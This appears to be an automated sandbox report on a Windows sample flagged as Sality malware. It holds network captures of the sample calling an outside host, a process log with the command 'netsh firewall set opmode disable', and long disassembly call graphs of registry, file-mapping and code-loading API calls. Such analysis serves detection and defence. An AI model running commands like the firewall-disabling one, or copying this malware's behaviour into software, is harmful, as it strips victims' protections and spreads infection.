                                Jul 25, 2024 13:45:07.083090067 CEST635INData Raw: 0a 3c 75 6c 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 75 63 6f 7a 2e 63 6f 6d 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 55 73 65 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                Data Ascii: <ul><li><a href="https://www.ucoz.com/terms/">Terms of Use</a></li><li><a href="https://www.ucoz.com/privacy/">Privacy Policy</a></li></ul></div> <div class="clear"></div> </div> </div></div><script> var pushe


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.849710107.172.18.180807092C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 13:45:07.708813906 CEST138OUTGET /mainf.gif?76caf3=7785203 HTTP/1.1
                                User-Agent: Opera/8.89 (Windows NT 6.0; U; en)
                                Host: steamboy.h17.ru
                                Cache-Control: no-cache
                                Jul 25, 2024 13:45:08.191555023 CEST382INHTTP/1.1 301 Moved Permanently
                                Server: nginx/1.25.2
                                Date: Thu, 25 Jul 2024 11:45:08 GMT
                                Content-Type: text/html
                                Content-Length: 169
                                Connection: keep-alive
                                Location: https://www.otzywy.com/?76caf3=7785203
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:07:45:00
                                Start date:25/07/2024
                                Path:C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\LisectAVT_2403002B_38.exe"
                                Imagebase:0x400000
                                File size:563'744 bytes
                                MD5 hash:DCD409FA904F30AB580781337FB866B7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Sality, Description: Yara detected Sality, Source: 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:1
                                Start time:07:45:00
                                Start date:25/07/2024
                                Path:C:\Windows\SysWOW64\netsh.exe
                                Wow64 process (32bit):true
                                Commandline:netsh firewall set opmode disable
                                Imagebase:0x15c0000
                                File size:82'432 bytes
                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:07:45:00
                                Start date:25/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6ee680000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:07:45:01
                                Start date:25/07/2024
                                Path:C:\Windows\System32\fontdrvhost.exe
                                Wow64 process (32bit):false
                                Commandline:"fontdrvhost.exe"
                                Imagebase:0x7ff69ba10000
                                File size:827'408 bytes
                                MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:5
                                Start time:07:45:01
                                Start date:25/07/2024
                                Path:C:\Windows\System32\fontdrvhost.exe
                                Wow64 process (32bit):false
                                Commandline:"fontdrvhost.exe"
                                Imagebase:0x7ff69ba10000
                                File size:827'408 bytes
                                MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                General

                                Target ID:6
                                Start time:07:45:01
                                Start date:25/07/2024
                                Path:C:\Windows\System32\dwm.exe
                                Wow64 process (32bit):false
                                Commandline:"dwm.exe"
                                Imagebase:0x7ff7751a0000
                                File size:94'720 bytes
                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:5.2%
                                  Dynamic/Decrypted Code Coverage:40.1%
                                  Signature Coverage:28.1%
                                  Total number of Nodes:822
                                  Total number of Limit Nodes:41
                                  execution_graph 25879 408440 194 API calls 25983 402b40 189 API calls 25919 407d40 184 API calls 3 library calls 25984 407f40 182 API calls 25920 408540 181 API calls 25949 407a40 186 API calls setSBUpLow 25950 408640 187 API calls ___crtsetenv 25985 419740 RtlUnwind 25880 410044 76 API calls _LocaleUpdate::_LocaleUpdate 25454 2303b39 RegSetValueExA RegCloseKey 25922 412951 78 API calls __filbuf 25923 407950 175 API calls 25924 406550 182 API calls setSBUpLow 25925 409d50 204 API calls 2 library calls 25986 405350 179 API calls 25953 40617b 183 API calls 3 library calls 25885 40a860 188 API calls 3 library calls 25927 401960 172 API calls 25955 407e60 182 API calls setSBUpLow 25991 408770 184 API calls 25956 22f341d 9 API calls 25888 407875 177 API calls 2 library calls 25889 22f9e18 GetFileAttributesA 25876 230260c RtlExitUserThread 25930 41297e 112 API calls 9 library calls 25890 408800 198 API calls 3 library calls 25931 408d00 211 API calls 3 library calls 25992 409700 190 API calls 4 library calls 24915 231f470 24916 231f488 24915->24916 24917 231f5a2 LoadLibraryA 24916->24917 24920 231f5e7 VirtualProtect VirtualProtect 24916->24920 24918 231f5b9 24917->24918 24918->24916 24922 231f5cb GetProcAddress 24918->24922 24921 231f64c 24920->24921 24921->24921 24922->24918 24923 231f5e1 ExitProcess 24922->24923 25893 22ffe67 FindClose Sleep 25959 410208 110 API calls 3 library calls 25894 41180e 105 API calls 4 library calls 25895 40dc0f 70 API calls ___InternalCxxFrameHandler 25896 408c10 195 API calls 25960 404210 171 API calls 25456 47c116 25458 47c11b 25456->25458 25459 47c137 LoadLibraryA 25458->25459 25469 47c150 25458->25469 25481 47c365 25459->25481 25463 47c17b GetModuleFileNameA 25470 47c2e7 LoadLibraryA GetProcAddress 25463->25470 25471 47c344 Sleep 25463->25471 25467 47c23e MapViewOfFile 25468 47c278 CreateThread 25467->25468 25473 47c254 25467->25473 25475 47c29e Sleep 25468->25475 25495 47c7d4 25468->25495 25469->25463 25476 47c365 7 API calls 25469->25476 25470->25471 25472 47c310 CreateMutexA GetLastError 25470->25472 25474 47c34f ExitProcess 25471->25474 25472->25471 25472->25474 25473->25468 25475->25463 25478 47c1af 25476->25478 25480 47c365 7 API calls 25478->25480 25480->25459 25482 47c2c2 GetModuleFileNameA 25481->25482 25483 47c1e4 25481->25483 25485 47c2e7 LoadLibraryA GetProcAddress 25482->25485 25486 47c344 Sleep 25482->25486 25490 47c36a 25483->25490 25485->25486 25487 47c310 CreateMutexA GetLastError 25485->25487 25488 47c34f ExitProcess 25486->25488 25487->25486 25487->25488 25491 47c36e 25490->25491 25491->25490 25491->25491 25492 47c371 GetProcAddress 25491->25492 25494 47c1fb SetErrorMode CreateFileMappingA CreateFileMappingA 25491->25494 25493 47c365 7 API calls 25492->25493 25493->25491 25494->25467 25494->25468 25496 47c933 CreateMutexA 25495->25496 25500 47c7e8 25495->25500 25496->25500 25497 47c969 25498 47cbc9 25497->25498 25499 47c9a0 VirtualAlloc 25497->25499 25499->25498 25503 47c9fb 25499->25503 25500->25496 25500->25497 25501 47cb64 LoadLibraryA 25501->25498 25501->25503 25503->25498 25503->25501 25504 47cbf5 KiUserExceptionDispatcher 25503->25504 25505 47cc08 25504->25505 25505->25503 25932 47d91c GetCPInfo 25933 402d20 193 API calls 4 library calls 25962 409220 192 API calls 25963 406e20 191 API calls 24924 2303e54 RegCloseKey 25966 230045c 17 API calls 25897 41282c 5 API calls 2 library calls 25967 404630 183 API calls 3 library calls 25898 414036 InitializeCriticalSection 25877 22f1d53 GlobalFree 25899 413c3f 68 API calls 2 library calls 25935 4079c0 190 API calls 25994 4087c0 185 API calls 25995 409fc0 193 API calls setSBUpLow 25969 40e2c8 5 API calls ___security_init_cookie 25936 4099cb 194 API calls 4 library calls 25996 22f61a0 GetFileAttributesA 25900 40a0d0 209 API calls 3 library calls 25970 405ed0 192 API calls __itoa 25971 4066d0 190 API calls 2 library calls 25997 4073d0 223 API calls 3 library calls 25998 40d7d0 6 API calls 3 library calls 25999 40bbd9 66 API calls ctype 26000 415fdf 67 API calls 2 library calls 25972 406ee0 173 API calls 2 library calls 26001 402be0 194 API calls 25903 4140e3 SetLastError type_info::_Type_info_dtor 25937 40ede6 TlsAlloc 24925 40e0e8 24980 410694 24925->24980 24927 40e0f4 GetStartupInfoA GetProcessHeap HeapAlloc 24928 40e133 GetVersionExA 24927->24928 24929 40e126 24927->24929 24931 40e151 GetProcessHeap HeapFree 24928->24931 24932 40e143 GetProcessHeap HeapFree 24928->24932 25018 40e083 66 API calls 3 library calls 24929->25018 24934 40e17d 24931->24934 24933 40e12d type_info::_Type_info_dtor 24932->24933 24981 415170 HeapCreate 24934->24981 24936 40e1be 24937 40e1ca 24936->24937 25019 40e083 66 API calls 3 library calls 24936->25019 25020 40f0cd 77 API calls 6 library calls 24937->25020 24940 40e1d0 24941 40e1d4 24940->24941 24942 40e1dc __RTC_Initialize 24940->24942 25021 40e083 66 API calls 3 library calls 24941->25021 24991 410412 71 API calls 3 library calls 24942->24991 24944 40e1db 24944->24942 24946 40e1e9 24947 40e1f5 GetCommandLineA 24946->24947 24948 40e1ed 24946->24948 24992 416e23 76 API calls 3 library calls 24947->24992 25022 40c5d6 66 API calls 3 library calls 24948->25022 24951 40e205 25023 416d6a 111 API calls 3 library calls 24951->25023 24952 40e1f4 24952->24947 24954 40e20f 24955 40e213 24954->24955 24956 40e21b 24954->24956 25024 40c5d6 66 API calls 3 library calls 24955->25024 24993 416af7 110 API calls 6 library calls 24956->24993 24959 40e21a 24959->24956 24960 40e220 24961 40e224 24960->24961 24962 40e22c 24960->24962 25025 40c5d6 66 API calls 3 library calls 24961->25025 24994 40c6f2 74 API calls 4 library calls 24962->24994 24965 40e22b 24965->24962 24966 40e232 24967 40e237 24966->24967 24968 40e23e 24966->24968 25026 40c5d6 66 API calls 3 library calls 24967->25026 24995 416a9a 110 API calls 2 library calls 24968->24995 24971 40e23d 24971->24968 24972 40e243 24973 40e248 24972->24973 24996 403a30 24972->24996 24973->24972 24976 40e26e 25030 40c888 66 API calls _abort 24976->25030 24979 40e273 24979->24933 24980->24927 24982 415190 24981->24982 24983 415193 24981->24983 24982->24936 25031 415115 66 API calls 3 library calls 24983->25031 24985 415198 24986 4151a2 24985->24986 24987 4151c6 24985->24987 25032 4151ca HeapAlloc 24986->25032 24987->24936 24989 4151ac 24989->24987 24990 4151b1 HeapDestroy 24989->24990 24990->24982 24991->24946 24992->24951 24993->24960 24994->24966 24995->24972 25033 403b80 RegOpenKeyExA 24996->25033 24998 403a5e 25060 40a9a0 24998->25060 25000 403a75 25153 4053f0 198 API calls setSBUpLow 25000->25153 25002 403a7e 25003 403a82 LoadStringA LoadStringA MessageBoxA 25002->25003 25004 403ac8 25002->25004 25005 403aed 25003->25005 25154 40b180 222 API calls 3 library calls 25004->25154 25157 40a450 213 API calls 2 library calls 25005->25157 25008 403ad1 25012 403ae8 25008->25012 25013 403aef 25008->25013 25009 403afd 25158 403df0 WaitForSingleObject UnmapViewOfFile CloseHandle ReleaseMutex CloseHandle 25009->25158 25011 403b02 25159 40c042 25011->25159 25155 4025b0 189 API calls 4 library calls 25012->25155 25156 401f00 173 API calls 3 library calls 25013->25156 25017 403b14 25017->24976 25027 40c866 25017->25027 25018->24933 25019->24937 25020->24940 25021->24944 25022->24952 25023->24954 25024->24959 25025->24965 25026->24971 25421 40c784 25027->25421 25029 40c873 25029->24976 25030->24979 25031->24985 25032->24989 25034 403bbb RegQueryValueExA 25033->25034 25035 403dcb 25033->25035 25037 403bfd _memset 25034->25037 25036 40c042 setSBUpLow 5 API calls 25035->25036 25038 403ddc 25036->25038 25039 403c4e RegCloseKey 25037->25039 25040 403c0f RegQueryValueExA 25037->25040 25038->24998 25039->25035 25041 403c61 25039->25041 25042 403c3b 25040->25042 25043 403c2b PathIsRelativeA 25040->25043 25041->25035 25044 403c6c CreateMutexA 25041->25044 25042->25039 25043->25039 25043->25042 25044->25035 25045 403c86 WaitForSingleObject CreateFileMappingA 25044->25045 25046 403ce2 GetLastError MapViewOfFile 25045->25046 25047 403cab ReleaseMutex CloseHandle 25045->25047 25049 403d55 GetFileAttributesA 25046->25049 25050 403d0d CloseHandle ReleaseMutex CloseHandle 25046->25050 25048 40c042 setSBUpLow 5 API calls 25047->25048 25051 403cdb 25048->25051 25055 403d70 CreateDirectoryA 25049->25055 25056 403d7c 25049->25056 25052 40c042 setSBUpLow 5 API calls 25050->25052 25051->24998 25054 403d4e 25052->25054 25054->24998 25055->25056 25167 40c051 25056->25167 25182 403260 25060->25182 25064 40aa0f 25300 4010c0 179 API calls 25064->25300 25066 40aa2a 25301 4010c0 179 API calls 25066->25301 25068 40aa45 25302 4010c0 179 API calls 25068->25302 25070 40aa60 25303 4010c0 179 API calls 25070->25303 25072 40aa7b 25304 4010c0 179 API calls 25072->25304 25074 40aa96 25305 4010c0 179 API calls 25074->25305 25076 40aab1 25306 4010c0 179 API calls 25076->25306 25078 40aacc 25307 4010c0 179 API calls 25078->25307 25080 40aae7 25308 4010c0 179 API calls 25080->25308 25082 40ab02 25309 4010c0 179 API calls 25082->25309 25084 40ab1d 25310 4010c0 179 API calls 25084->25310 25086 40ab38 25311 4010c0 179 API calls 25086->25311 25088 40ab53 25312 4010c0 179 API calls 25088->25312 25090 40ab6e 25313 4010c0 179 API calls 25090->25313 25092 40ab89 25314 4010c0 179 API calls 25092->25314 25094 40aba4 25315 4010c0 179 API calls 25094->25315 25096 40abbf 25316 4010c0 179 API calls 25096->25316 25098 40abda 25317 4010c0 179 API calls 25098->25317 25100 40abf5 25318 4010c0 179 API calls 25100->25318 25102 40ac10 25319 4010c0 179 API calls 25102->25319 25104 40ac2b 25320 4010c0 179 API calls 25104->25320 25106 40ac46 25321 4010c0 179 API calls 25106->25321 25108 40ac61 25322 4010c0 179 API calls 25108->25322 25110 40ac7c 25323 4010c0 179 API calls 25110->25323 25112 40ac97 25324 4010c0 179 API calls 25112->25324 25114 40acb2 25325 4010c0 179 API calls 25114->25325 25116 40accd 25326 4010c0 179 API calls 25116->25326 25118 40ace8 25327 4010c0 179 API calls 25118->25327 25120 40ad03 25328 4010c0 179 API calls 25120->25328 25122 40ad1e 25329 4010c0 179 API calls 25122->25329 25124 40ad39 25330 4010c0 179 API calls 25124->25330 25126 40ad54 25331 4010c0 179 API calls 25126->25331 25128 40ad6f 25332 4010c0 179 API calls 25128->25332 25130 40ad8a 25333 4010c0 179 API calls 25130->25333 25132 40ada5 25334 4010c0 179 API calls 25132->25334 25134 40adc0 25335 4010c0 179 API calls 25134->25335 25136 40addb 25336 4010c0 179 API calls 25136->25336 25138 40adf6 25337 4025b0 189 API calls 4 library calls 25138->25337 25140 40ae02 25338 4025b0 189 API calls 4 library calls 25140->25338 25142 40ae0e 25339 4025b0 189 API calls 4 library calls 25142->25339 25144 40ae1a 25340 4025b0 189 API calls 4 library calls 25144->25340 25146 40ae26 25341 401c90 181 API calls 2 library calls 25146->25341 25148 40ae37 25342 401110 171 API calls __fsopen 25148->25342 25150 40ae43 25150->25150 25343 401c90 181 API calls 2 library calls 25150->25343 25152 40ae9f LoadStringA 25152->25000 25153->25002 25154->25008 25155->25005 25156->25005 25157->25009 25158->25011 25160 40c04a 25159->25160 25161 40c04c IsDebuggerPresent 25159->25161 25160->25017 25420 417530 25161->25420 25164 41134d SetUnhandledExceptionFilter UnhandledExceptionFilter 25165 411372 GetCurrentProcess TerminateProcess 25164->25165 25166 41136a __invoke_watson 25164->25166 25165->25017 25166->25165 25168 40c07c 25167->25168 25169 40c05f 25167->25169 25168->25169 25171 40c083 25168->25171 25178 40f493 66 API calls _raise 25169->25178 25180 4108ee 102 API calls 13 library calls 25171->25180 25172 40c064 25179 40f434 66 API calls 2 library calls 25172->25179 25175 40c0a9 25176 403d90 ReleaseMutex 25175->25176 25181 4106ed 100 API calls 5 library calls 25175->25181 25176->25035 25178->25172 25180->25175 25181->25176 25344 403e70 25182->25344 25185 4032b1 GetCurrentProcess 25186 4032c3 25185->25186 25187 403303 25186->25187 25189 40c051 _sprintf 102 API calls 25186->25189 25187->25187 25367 40bc1d 75 API calls 5 library calls 25187->25367 25191 4032e4 MessageBoxA 25189->25191 25190 4033a4 25368 4010c0 179 API calls 25190->25368 25193 40c866 66 API calls 25191->25193 25193->25187 25194 4033f3 25369 4010c0 179 API calls 25194->25369 25196 40340e 25370 4010c0 179 API calls 25196->25370 25198 403429 25371 4010c0 179 API calls 25198->25371 25200 403444 25372 4010c0 179 API calls 25200->25372 25202 40345f 25373 4010c0 179 API calls 25202->25373 25204 40347a 25374 4010c0 179 API calls 25204->25374 25206 403495 25375 4010c0 179 API calls 25206->25375 25208 4034b0 25376 4010c0 179 API calls 25208->25376 25210 4034cb 25377 4010c0 179 API calls 25210->25377 25212 4034e6 25378 4010c0 179 API calls 25212->25378 25214 403501 25379 4010c0 179 API calls 25214->25379 25216 40351c 25380 4010c0 179 API calls 25216->25380 25218 403537 25381 4010c0 179 API calls 25218->25381 25220 403552 25382 4010c0 179 API calls 25220->25382 25222 40356d 25383 4010c0 179 API calls 25222->25383 25224 403588 GetWindowsDirectoryA 25384 401c90 181 API calls 2 library calls 25224->25384 25227 4035ea GetSystemDirectoryA 25385 401c90 181 API calls 2 library calls 25227->25385 25229 403611 25386 401b50 174 API calls 25229->25386 25231 403623 25387 401c90 181 API calls 2 library calls 25231->25387 25233 40363a GetCurrentDirectoryA 25388 401c90 181 API calls 2 library calls 25233->25388 25235 403661 _memset 25236 40367b SHGetFolderPathA 25235->25236 25237 40369a PathAppendA 25236->25237 25238 4036ad 25236->25238 25237->25238 25389 401c90 181 API calls 2 library calls 25238->25389 25240 4036c1 SHGetFolderPathA 25241 4036d7 25240->25241 25242 4036eb SHGetSpecialFolderPathA 25240->25242 25390 401c90 181 API calls 2 library calls 25241->25390 25391 401c90 181 API calls 2 library calls 25242->25391 25245 403713 SHGetSpecialFolderPathA 25392 401c90 181 API calls 2 library calls 25245->25392 25247 403735 25393 40c553 121 API calls 5 library calls 25247->25393 25249 40373f 25394 401c90 181 API calls 2 library calls 25249->25394 25251 40374f 25395 40c553 121 API calls 5 library calls 25251->25395 25253 403759 25396 401c90 181 API calls 2 library calls 25253->25396 25255 403769 SHGetSpecialFolderPathA 25397 401c90 181 API calls 2 library calls 25255->25397 25257 40378b GetUserDefaultLangID 25258 40c051 _sprintf 102 API calls 25257->25258 25259 4037aa 25258->25259 25398 401c90 181 API calls 2 library calls 25259->25398 25261 4037c1 25262 40c051 _sprintf 102 API calls 25261->25262 25263 4037da 25262->25263 25399 401c90 181 API calls 2 library calls 25263->25399 25265 4037f1 25400 401c90 181 API calls 2 library calls 25265->25400 25267 403802 GetModuleFileNameA 25401 401c90 181 API calls 2 library calls 25267->25401 25269 40382d 25402 401c90 181 API calls 2 library calls 25269->25402 25271 403841 25403 401300 76 API calls 25271->25403 25273 403850 25404 401c90 181 API calls 2 library calls 25273->25404 25275 40385d GetComputerNameA 25405 401c90 181 API calls 2 library calls 25275->25405 25277 40388c GetUserNameA 25406 401c90 181 API calls 2 library calls 25277->25406 25279 4038b3 GetVersionExA 25280 40c051 _sprintf 102 API calls 25279->25280 25281 4038dd 25280->25281 25407 401c90 181 API calls 2 library calls 25281->25407 25283 4038f4 25284 40c051 _sprintf 102 API calls 25283->25284 25285 40390b 25284->25285 25408 401c90 181 API calls 2 library calls 25285->25408 25287 403922 25288 403931 25287->25288 25289 4039ae 25287->25289 25290 4039f9 25288->25290 25409 401c90 181 API calls 2 library calls 25288->25409 25410 401c90 181 API calls 2 library calls 25289->25410 25412 401c90 181 API calls 2 library calls 25290->25412 25294 403a0a 25295 40c042 setSBUpLow 5 API calls 25294->25295 25296 403a1e 25295->25296 25299 4010c0 179 API calls 25296->25299 25298 40394b 25298->25290 25411 401c90 181 API calls 2 library calls 25298->25411 25299->25064 25300->25066 25301->25068 25302->25070 25303->25072 25304->25074 25305->25076 25306->25078 25307->25080 25308->25082 25309->25084 25310->25086 25311->25088 25312->25090 25313->25092 25314->25094 25315->25096 25316->25098 25317->25100 25318->25102 25319->25104 25320->25106 25321->25108 25322->25110 25323->25112 25324->25114 25325->25116 25326->25118 25327->25120 25328->25122 25329->25124 25330->25126 25331->25128 25332->25130 25333->25132 25334->25134 25335->25136 25336->25138 25337->25140 25338->25142 25339->25144 25340->25146 25341->25148 25342->25150 25343->25152 25345 403e7a 25344->25345 25346 403e95 WaitForSingleObject 25345->25346 25347 403f98 25345->25347 25413 40c02b 102 API calls __vsprintf_l 25346->25413 25348 40c042 setSBUpLow 5 API calls 25347->25348 25350 40328f GetModuleHandleA GetProcAddress 25348->25350 25350->25185 25350->25187 25351 403ec1 OutputDebugStringA 25414 40c3e9 160 API calls __fsopen 25351->25414 25353 403ee1 25354 403f8a ReleaseMutex 25353->25354 25355 403eee GetLocalTime GetTimeFormatA 25353->25355 25354->25347 25356 403f3a 25355->25356 25357 403f1e 25355->25357 25359 403f6c 25356->25359 25416 40cff5 103 API calls 7 library calls 25356->25416 25415 40c1d6 104 API calls 8 library calls 25357->25415 25417 40cff5 103 API calls 7 library calls 25359->25417 25362 403f7a 25418 40cf99 106 API calls 3 library calls 25362->25418 25364 403f80 25419 40c15a 105 API calls 5 library calls 25364->25419 25366 403f86 25366->25354 25367->25190 25368->25194 25369->25196 25370->25198 25371->25200 25372->25202 25373->25204 25374->25206 25375->25208 25376->25210 25377->25212 25378->25214 25379->25216 25380->25218 25381->25220 25382->25222 25383->25224 25384->25227 25385->25229 25386->25231 25387->25233 25388->25235 25389->25240 25390->25242 25391->25245 25392->25247 25393->25249 25394->25251 25395->25253 25396->25255 25397->25257 25398->25261 25399->25265 25400->25267 25401->25269 25402->25271 25403->25273 25404->25275 25405->25277 25406->25279 25407->25283 25408->25287 25409->25298 25410->25298 25411->25290 25412->25294 25413->25351 25414->25353 25415->25356 25416->25356 25417->25362 25418->25364 25419->25366 25420->25164 25422 40c790 type_info::_Type_info_dtor 25421->25422 25440 411a2d 66 API calls 2 library calls 25422->25440 25424 40c797 25425 40c816 _abort 25424->25425 25427 40c7bb 25424->25427 25445 40c851 LeaveCriticalSection __freefls@4 25425->25445 25441 40ed78 66 API calls __output_l 25427->25441 25428 40c832 25430 40c84e type_info::_Type_info_dtor 25428->25430 25446 411955 LeaveCriticalSection 25428->25446 25430->25029 25431 40c7c6 25442 40ed78 66 API calls __output_l 25431->25442 25434 40c845 25447 40c620 25434->25447 25436 40c806 _abort 25436->25425 25437 40c7d4 25437->25436 25443 40ed6f 66 API calls __initp_misc_cfltcvt_tab 25437->25443 25444 40ed78 66 API calls __output_l 25437->25444 25440->25424 25441->25431 25442->25437 25443->25437 25444->25437 25445->25428 25446->25434 25450 40c5fa GetModuleHandleA 25447->25450 25451 40c609 GetProcAddress 25450->25451 25452 40c61f ExitProcess 25450->25452 25451->25452 25453 40c619 25451->25453 25453->25452 25938 4031f0 191 API calls 25939 4069f0 185 API calls _memset 25973 40aef0 194 API calls 26003 4017f0 172 API calls 26004 408ff0 191 API calls 3 library calls 25974 40c6f3 74 API calls 4 library calls 25940 41adf7 CloseHandle CloseHandle 25975 22fd099 11 API calls 25941 22ff794 Sleep 25942 404580 175 API calls 25976 408a80 210 API calls 3 library calls 26005 402b80 187 API calls 25909 409889 186 API calls 3 library calls 25978 416a8c SetUnhandledExceptionFilter 25912 402490 177 API calls __fcloseall 25913 408c90 199 API calls 25943 401990 176 API calls _memset 25944 409590 213 API calls 25979 401e90 181 API calls ___crtsetenv 26006 404f90 194 API calls setSBUpLow 25509 2302de6 25530 23078a0 25509->25530 25512 2302e2d 25532 2302847 25512->25532 25515 2302e53 CreateThread FindCloseChangeNotification CreateThread 25516 2302e95 CreateThread FindCloseChangeNotification CreateThread FindCloseChangeNotification 25515->25516 25641 2302633 25515->25641 25660 22fb3f5 25515->25660 25555 2303090 CreateFileMappingA 25516->25555 25626 22fb81a 25516->25626 25633 22f3f98 Sleep 25516->25633 25520 2303014 CreateThread 25523 2303035 CreateThread 25520->25523 25686 22f3846 25520->25686 25521 2302f1d 25521->25520 25573 22fbd79 25521->25573 25524 2303056 25523->25524 25674 22f3d56 25523->25674 25526 230306c 25524->25526 25527 230305f Sleep 25524->25527 25525 2303930 6 API calls 25528 2303009 25525->25528 25527->25524 25528->25520 25529 2302f62 25529->25525 25531 2302e08 SetErrorMode 25530->25531 25531->25512 25533 2302871 25532->25533 25577 2301d03 RegOpenKeyExA 25533->25577 25536 2302952 LoadLibraryA 25537 23029d1 RegOpenKeyExA 25536->25537 25545 230296e 25536->25545 25538 23029f5 RegSetValueExA RegCloseKey 25537->25538 25539 2302a2d RegOpenKeyExA 25537->25539 25538->25539 25540 2302a51 RegSetValueExA 25539->25540 25541 2302a89 RegOpenKeyExA 25539->25541 25540->25541 25542 2302b19 GetComputerNameA 25541->25542 25549 2302aad 25541->25549 25544 2302b44 CreateFileMappingA 25542->25544 25543 2302908 25543->25536 25547 2302bb8 25544->25547 25545->25537 25588 22f1b6e 25547->25588 25549->25542 25550 2302bc2 25552 2302bd9 CharLowerA GlobalAlloc 25550->25552 25601 22fba5a 25550->25601 25554 2302d93 CreateThread 25552->25554 25554->25515 25667 230161b GlobalAlloc 25554->25667 25556 2302f09 25555->25556 25557 23030dc MapViewOfFile 25555->25557 25558 2303930 25556->25558 25557->25556 25559 23039eb 25558->25559 25560 23039df 25558->25560 25559->25521 25560->25559 25561 2303a02 GetUserNameA 25560->25561 25562 2303a2b 25561->25562 25563 2303a54 RegOpenKeyExA 25562->25563 25564 2303a7f 25563->25564 25564->25559 25565 2303ac4 RegEnumValueA 25564->25565 25568 2303ca9 25564->25568 25570 2303b2d 25565->25570 25567 2303b91 25567->25559 25569 2303e67 RegCloseKey 25567->25569 25568->25567 25571 2303d4f RegQueryValueExA 25568->25571 25569->25559 25570->25567 25572 2303c5e RegSetValueExA 25570->25572 25571->25567 25572->25570 25574 22fbdbd 25573->25574 25576 22fbde6 25573->25576 25575 22fbdc6 MapViewOfFile 25574->25575 25574->25576 25575->25576 25576->25529 25578 2301d54 RegSetValueExA RegCloseKey 25577->25578 25579 2301d8b 25577->25579 25578->25579 25606 2301c79 RegOpenKeyExA 25579->25606 25582 2301c79 4 API calls 25584 2301dbc 25582->25584 25583 2301c79 4 API calls 25583->25584 25584->25583 25585 2301e07 25584->25585 25586 2301e77 WinExec LoadLibraryA 25585->25586 25587 2301c79 4 API calls 25585->25587 25586->25536 25586->25543 25587->25585 25589 22f1b98 25588->25589 25590 22f1c23 GetUserNameA 25589->25590 25600 22f1c05 25589->25600 25591 22f1c4c 25590->25591 25592 22f1cab RegOpenKeyExA 25591->25592 25593 22f1cd6 RegCreateKeyA 25592->25593 25592->25600 25594 22f1cff 25593->25594 25593->25600 25595 22fbd79 MapViewOfFile 25594->25595 25596 22f1d1e 25595->25596 25599 22f1d37 25596->25599 25611 22f226c 25596->25611 25598 22f1f18 GlobalFree 25598->25600 25599->25598 25599->25600 25600->25550 25602 22fbaa6 GetPrivateProfileStringA 25601->25602 25604 22fbadf 25602->25604 25603 22fbb67 25603->25552 25604->25603 25605 22fbb42 WritePrivateProfileStringA 25604->25605 25605->25603 25607 2301ca3 RegSetValueExA 25606->25607 25608 2301cc7 RegCreateKeyA 25606->25608 25610 2301cc5 25607->25610 25609 2301cdd RegSetValueExA 25608->25609 25608->25610 25609->25610 25610->25582 25612 22f2279 25611->25612 25613 22f2336 25612->25613 25615 22f1869 25612->25615 25613->25599 25616 22f1876 25615->25616 25617 22f197d RegOpenKeyExA 25616->25617 25620 22f18de 25616->25620 25618 22f19a4 25617->25618 25619 22f1b40 RegCloseKey 25618->25619 25618->25620 25623 22f19ee 25618->25623 25619->25620 25620->25613 25621 22f1b0e RegSetValueExA 25624 22f1b3b 25621->25624 25622 22f1aeb RegSetValueExA 25622->25624 25623->25621 25623->25622 25624->25613 25632 22fb892 25626->25632 25627 22fba49 25628 22fb917 FindFirstFileA 25629 22fb941 FindNextFileA 25628->25629 25628->25632 